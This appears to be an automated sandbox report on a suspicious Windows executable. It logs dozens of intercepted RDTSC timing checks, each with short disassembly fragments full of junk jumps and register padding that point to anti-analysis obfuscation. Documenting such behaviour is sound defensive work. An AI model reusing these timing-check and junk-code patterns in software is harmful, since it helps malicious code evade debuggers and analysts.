Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4EB06DE second address: 4EB06E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4EB06E4 second address: 4EB07CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E51Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FED74F3E51Eh 0x00000011 add ax, 0238h 0x00000016 jmp 00007FED74F3E51Bh 0x0000001b popfd 0x0000001c push eax 0x0000001d mov ebx, 29FE7A5Ah 0x00000022 pop edi 0x00000023 popad 0x00000024 push eax 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007FED74F3E527h 0x0000002c jmp 00007FED74F3E523h 0x00000031 popfd 0x00000032 jmp 00007FED74F3E528h 0x00000037 popad 0x00000038 xchg eax, ecx 0x00000039 pushad 0x0000003a pushfd 0x0000003b jmp 00007FED74F3E51Eh 0x00000040 or si, 0158h 0x00000045 jmp 00007FED74F3E51Bh 0x0000004a popfd 0x0000004b popad 0x0000004c mov eax, dword ptr [76FB65FCh] 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 call 00007FED74F3E51Eh 0x00000059 pop ecx 0x0000005a pushfd 0x0000005b jmp 00007FED74F3E51Bh 0x00000060 add cx, 4CCEh 0x00000065 jmp 00007FED74F3E529h 0x0000006a popfd 0x0000006b popad 0x0000006c rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4EB07CD second address: 4EB0842 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, F1E2h 0x00000007 call 00007FED75508873h 0x0000000c pop esi 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 test eax, eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FED75508870h 0x0000001b sub cx, A7A8h 0x00000020 jmp 00007FED7550886Bh 0x00000025 popfd 0x00000026 pushfd 0x00000027 jmp 00007FED75508878h 0x0000002c jmp 00007FED75508875h 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4EB0842 second address: 4EB0848 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4EB0848 second address: 4EB084C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4EB084C second address: 4EB08EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FEDE6FC1628h 0x0000000e jmp 00007FED74F3E51Fh 0x00000013 mov ecx, eax 0x00000015 jmp 00007FED74F3E526h 0x0000001a xor eax, dword ptr [ebp+08h] 0x0000001d jmp 00007FED74F3E521h 0x00000022 and ecx, 1Fh 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007FED74F3E51Ch 0x0000002c jmp 00007FED74F3E525h 0x00000031 popfd 0x00000032 mov edi, esi 0x00000034 popad 0x00000035 ror eax, cl 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a pushfd 0x0000003b jmp 00007FED74F3E51Fh 0x00000040 jmp 00007FED74F3E523h 0x00000045 popfd 0x00000046 pushad 0x00000047 popad 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4EB08EB second address: 4EB08F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4EB08F1 second address: 4EB08F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4EB08F5 second address: 4EB0945 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508871h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b leave 0x0000000c jmp 00007FED7550886Eh 0x00000011 retn 0004h 0x00000014 nop 0x00000015 mov esi, eax 0x00000017 lea eax, dword ptr [ebp-08h] 0x0000001a xor esi, dword ptr [00541014h] 0x00000020 push eax 0x00000021 push eax 0x00000022 push eax 0x00000023 lea eax, dword ptr [ebp-10h] 0x00000026 push eax 0x00000027 call 00007FED79EB9764h 0x0000002c push FFFFFFFEh 0x0000002e pushad 0x0000002f pushad 0x00000030 push ecx 0x00000031 pop ebx 0x00000032 mov esi, 02C753BFh 0x00000037 popad 0x00000038 mov edx, eax 0x0000003a popad 0x0000003b pop eax 0x0000003c jmp 00007FED7550886Eh 0x00000041 ret 0x00000042 nop 0x00000043 push eax 0x00000044 call 00007FED79EB977Ch 0x00000049 mov edi, edi 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4EB0945 second address: 4EB0949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4EB0949 second address: 4EB094D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4EB094D second address: 4EB0953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4EB0953 second address: 4EB09A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508874h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FED75508870h 0x0000000f push eax 0x00000010 jmp 00007FED7550886Bh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FED75508875h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4EB09A0 second address: 4EB09C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FED74F3E527h 0x00000008 pop esi 0x00000009 mov cx, di 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4EB09C9 second address: 4EB09CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4EB09CD second address: 4EB09D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4EB09D1 second address: 4EB09D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4EB09D7 second address: 4EB09DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4EB09DD second address: 4EB09E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4EB09E1 second address: 4EB09FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E521h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4EB09FF second address: 4EB0A03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4EB0A03 second address: 4EB0A16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E51Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4EB0A16 second address: 4EB0A2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED75508874h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4EB0A2E second address: 4EB0A32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E60011 second address: 4E60021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED7550886Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E60021 second address: 4E60025 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E60025 second address: 4E60058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007FED7550886Ch 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007FED75508870h 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b movsx edx, ax 0x0000001e mov cl, 52h 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E60058 second address: 4E60073 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED74F3E527h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E60073 second address: 4E600CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and esp, FFFFFFF8h 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FED7550886Eh 0x00000012 sbb ecx, 04A10E08h 0x00000018 jmp 00007FED7550886Bh 0x0000001d popfd 0x0000001e popad 0x0000001f xchg eax, ecx 0x00000020 jmp 00007FED75508876h 0x00000025 push eax 0x00000026 pushad 0x00000027 push edi 0x00000028 mov edi, esi 0x0000002a pop esi 0x0000002b mov esi, edx 0x0000002d popad 0x0000002e xchg eax, ecx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 mov edx, ecx 0x00000034 mov ah, B5h 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E600CA second address: 4E600D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E600D0 second address: 4E600EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov al, dl 0x0000000e call 00007FED7550886Eh 0x00000013 pop esi 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E600EE second address: 4E60109 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E520h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E60109 second address: 4E6010D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E6010D second address: 4E60129 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E528h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E60129 second address: 4E60174 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED7550886Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007FED75508876h 0x0000000f mov ebx, dword ptr [ebp+10h] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007FED7550886Dh 0x0000001a call 00007FED75508870h 0x0000001f pop esi 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E60174 second address: 4E601AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E520h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007FED74F3E520h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FED74F3E51Eh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E601AA second address: 4E601DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED7550886Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007FED75508876h 0x0000000f mov esi, dword ptr [ebp+08h] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov ecx, edx 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E601DB second address: 4E60217 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, di 0x00000006 pushfd 0x00000007 jmp 00007FED74F3E527h 0x0000000c jmp 00007FED74F3E523h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 xchg eax, edi 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E60217 second address: 4E60232 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508877h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E60232 second address: 4E6025E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E529h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FED74F3E51Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E6025E second address: 4E60280 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 jmp 00007FED7550886Dh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, edi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov eax, edx 0x00000014 mov ebx, 3E95653Ah 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E60280 second address: 4E60304 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E520h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b jmp 00007FED74F3E520h 0x00000010 je 00007FEDE700C885h 0x00000016 jmp 00007FED74F3E520h 0x0000001b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000022 jmp 00007FED74F3E520h 0x00000027 je 00007FEDE700C86Eh 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007FED74F3E51Dh 0x00000036 xor ax, 2476h 0x0000003b jmp 00007FED74F3E521h 0x00000040 popfd 0x00000041 mov ebx, ecx 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E60304 second address: 4E60320 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED75508878h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E60320 second address: 4E603C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [esi+44h] 0x0000000b jmp 00007FED74F3E527h 0x00000010 or edx, dword ptr [ebp+0Ch] 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FED74F3E524h 0x0000001a and esi, 297AAE58h 0x00000020 jmp 00007FED74F3E51Bh 0x00000025 popfd 0x00000026 mov edi, esi 0x00000028 popad 0x00000029 test edx, 61000000h 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007FED74F3E520h 0x00000036 sbb esi, 7C6C38B8h 0x0000003c jmp 00007FED74F3E51Bh 0x00000041 popfd 0x00000042 jmp 00007FED74F3E528h 0x00000047 popad 0x00000048 jne 00007FEDE700C7EBh 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 push ebx 0x00000052 pop ecx 0x00000053 movsx edi, cx 0x00000056 popad 0x00000057 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E603C2 second address: 4E603D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED7550886Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E603D4 second address: 4E6043B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test byte ptr [esi+48h], 00000001h 0x0000000c pushad 0x0000000d call 00007FED74F3E51Dh 0x00000012 pushfd 0x00000013 jmp 00007FED74F3E520h 0x00000018 add ecx, 7E9CF7D8h 0x0000001e jmp 00007FED74F3E51Bh 0x00000023 popfd 0x00000024 pop esi 0x00000025 jmp 00007FED74F3E529h 0x0000002a popad 0x0000002b jne 00007FEDE700C78Bh 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 mov edx, 66E7774Eh 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E6043B second address: 4E60441 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E60441 second address: 4E60445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E60445 second address: 4E60456 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test bl, 00000007h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E60456 second address: 4E60468 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E51Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E60468 second address: 4E6047A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED7550886Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E6047A second address: 4E6047E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E50884 second address: 4E508A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, 9Ch 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FED7550886Dh 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 movsx edi, si 0x00000014 popad 0x00000015 and esp, FFFFFFF8h 0x00000018 pushad 0x00000019 push ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E508A8 second address: 4E508CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push ebx 0x00000007 jmp 00007FED74F3E524h 0x0000000c mov dword ptr [esp], ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E508CC second address: 4E508E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508879h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E508E9 second address: 4E5095C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E521h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b call 00007FED74F3E51Ch 0x00000010 pushad 0x00000011 popad 0x00000012 pop eax 0x00000013 pushfd 0x00000014 jmp 00007FED74F3E521h 0x00000019 sbb eax, 43510FB6h 0x0000001f jmp 00007FED74F3E521h 0x00000024 popfd 0x00000025 popad 0x00000026 push eax 0x00000027 jmp 00007FED74F3E521h 0x0000002c xchg eax, esi 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FED74F3E51Dh 0x00000034 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E5095C second address: 4E50A3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FED75508877h 0x00000009 xor ecx, 13C54A4Eh 0x0000000f jmp 00007FED75508879h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FED75508870h 0x0000001b and ax, B6C8h 0x00000020 jmp 00007FED7550886Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 mov esi, dword ptr [ebp+08h] 0x0000002c pushad 0x0000002d jmp 00007FED75508874h 0x00000032 push esi 0x00000033 movsx edx, ax 0x00000036 pop esi 0x00000037 popad 0x00000038 mov ebx, 00000000h 0x0000003d pushad 0x0000003e jmp 00007FED75508874h 0x00000043 popad 0x00000044 test esi, esi 0x00000046 jmp 00007FED7550886Ch 0x0000004b je 00007FEDE75DE1F1h 0x00000051 jmp 00007FED75508870h 0x00000056 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000005d pushad 0x0000005e pushad 0x0000005f mov bx, cx 0x00000062 mov esi, 14DB41DFh 0x00000067 popad 0x00000068 mov edi, eax 0x0000006a popad 0x0000006b mov ecx, esi 0x0000006d push eax 0x0000006e push edx 0x0000006f jmp 00007FED7550886Dh 0x00000074 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E50A3F second address: 4E50A75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E521h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FEDE7013E65h 0x0000000f jmp 00007FED74F3E51Eh 0x00000014 test byte ptr [76FB6968h], 00000002h 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov bl, 9Eh 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E50A75 second address: 4E50A7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E50A7B second address: 4E50A7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E50A7F second address: 4E50AF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED7550886Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007FEDE75DE18Ah 0x00000011 pushad 0x00000012 pushad 0x00000013 push eax 0x00000014 pop ebx 0x00000015 jmp 00007FED75508876h 0x0000001a popad 0x0000001b call 00007FED75508872h 0x00000020 call 00007FED75508872h 0x00000025 pop eax 0x00000026 pop ebx 0x00000027 popad 0x00000028 mov edx, dword ptr [ebp+0Ch] 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FED75508878h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E50AF9 second address: 4E50B08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E51Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E50B08 second address: 4E50B0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E50B0E second address: 4E50B12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E50B12 second address: 4E50B16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E50B16 second address: 4E50B25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E50B25 second address: 4E50B29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E50B29 second address: 4E50B42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E525h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E50B42 second address: 4E50BA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FED75508873h 0x00000009 add cl, 0000007Eh 0x0000000c jmp 00007FED75508879h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov dword ptr [esp], ebx 0x00000018 jmp 00007FED7550886Eh 0x0000001d xchg eax, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FED75508877h 0x00000025 rdtsc
